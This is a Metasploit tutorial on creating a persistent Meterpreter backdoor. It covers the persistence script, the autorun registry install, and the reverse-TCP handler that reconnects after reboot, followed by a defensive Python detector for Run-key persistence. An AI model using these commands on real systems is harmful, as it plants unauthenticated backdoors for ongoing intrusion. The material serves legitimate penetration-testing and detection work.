UNDERSTANDING METASPLOIT METERPRETER
After going through all the hard work of exploiting a system, it is often a good idea to leave yourself an easier way back into the system for later use. That way, if the service you originally exploited is taken down or patched, you can still access the system. Metasploit has a Meterpreter script, persistence.rb, that will create a Meterpreter service that is available even after the remote system is rebooted.
Before proceeding with anything, a word of warning. The persistent Meterpreter shown here requires no authentication. This means that anyone who gains access to that port can access your backdoor! This is not a good thing if you are conducting a penetration test, as it could be a significant risk. In the real world, be extremely careful and be sure to clean up after yourself after an engagement.
After initially exploiting a host, we run persistence with the -h switch to see which options are available:
meterpreter > run persistence -h
[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching exploit/multi/handler to connect to the agent
    -L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on which the system running Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back
We will configure our persistent Meterpreter session to wait until a user logs on to the remote system and to try connecting back to our listener at IP address 192.168.1.71 on port 443 every 5 seconds.
meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.71
[*] Creating a persistent agent: LHOST=192.168.1.71 LPORT=443 (interval=5 onboot=true)
[*] Persistent agent script is 613976 bytes long
[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\yyPSPPEn.vbs
[*] Agent executed with PID 492
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr
[*] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/persistence/XEN-XP-SP2-BARE_20100821.2602/clean_up__20100821.2602.rc
meterpreter >
Notice that the script output gives you the command to remove the persistent listener when you are done with it. Be sure to make a note of it so that you do not leave an unauthenticated backdoor on the system. To verify that it works, we reboot the remote system and set up our payload handler.
meterpreter > reboot
Rebooting...
meterpreter > exit

[*] Meterpreter session 3 closed.  Reason: User exit
msf exploit(ms08_067_netapi) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.71
LHOST => 192.168.1.71
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.71:443
[*] Starting the payload handler...
When a user logs on to the remote system, a Meterpreter session is opened for us.
[*] Sending stage (748544 bytes) to 192.168.1.161
[*] Meterpreter session 5 opened (192.168.1.71:443 -> 192.168.1.161:1045) at 2010-08-21 12:31:42 -0600

meterpreter > sysinfo
Computer: XEN-XP-SP2-BARE
OS      : Windows XP (Build 2600, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter >
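The persistence script above leaves two artifacts a defender can look for: a .vbs agent dropped in %TEMP% and a randomly named value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run pointing at it. The following is an added detection example, not part of this page or of Metasploit; it runs a heuristic over constructed records shaped like Sysmon Event ID 13 (registry value set) fields and flags autorun values that launch a script file from a temp directory. The field names and sample records are assumptions built for this example.

```python
import re

# Constructed sample events (not real telemetry), shaped like Sysmon Event ID 13
# fields. The first record mirrors the artifacts printed by persistence.rb above.
SAMPLE_EVENTS = [
    {"EventID": 13,
     "TargetObject": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\YeYHdlEDygViABr",
     "Details": "C:\\WINDOWS\\TEMP\\yyPSPPEn.vbs"},
    {"EventID": 13,
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\VendorUpdater",
     "Details": "\"C:\\Program Files\\Vendor\\updater.exe\" /quiet"},
    {"EventID": 13,
     "TargetObject": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden",
     "Details": "DWORD (0x00000001)"},
]

# Run and RunOnce keys under either hive (HKCU appears as HKU\<SID> in Sysmon).
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
# Script files that Windows Script Host or cmd.exe will execute from an autorun value.
SCRIPT_EXT_RE = re.compile(r"\.(vbs|vbe|js|jse|wsf|bat|cmd|ps1)(\"|\s|$)", re.IGNORECASE)
# Temp directories, which legitimate installers rarely use for a persistent autorun target.
TEMP_DIR_RE = re.compile(r"\\(TEMP|TMP|AppData\\Local\\Temp)\\", re.IGNORECASE)


def assess_run_key_event(event):
    """Return the reasons an autorun write looks like script-based persistence ([] if none)."""
    if event.get("EventID") != 13 or not RUN_KEY_RE.search(event.get("TargetObject", "")):
        return []  # not a Run/RunOnce value being set
    details = event.get("Details", "")
    reasons = []
    if SCRIPT_EXT_RE.search(details):
        reasons.append("autorun value launches a script file")
    if TEMP_DIR_RE.search(details):
        reasons.append("autorun target lives in a temp directory")
    return reasons


def find_suspicious(events):
    """Pair each flagged value name with its reasons; benign autorun writes are dropped."""
    hits = []
    for event in events:
        reasons = assess_run_key_event(event)
        if reasons:
            hits.append((event["TargetObject"], reasons))
    return hits


if __name__ == "__main__":
    for target, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"[!] {target}: {'; '.join(reasons)}")
```

Either indicator alone is worth triage; both together match the pattern the page's script produces. Pair the alert with the cleanup .rc the script prints, since removing the Run value without deleting the .vbs leaves the agent on disk.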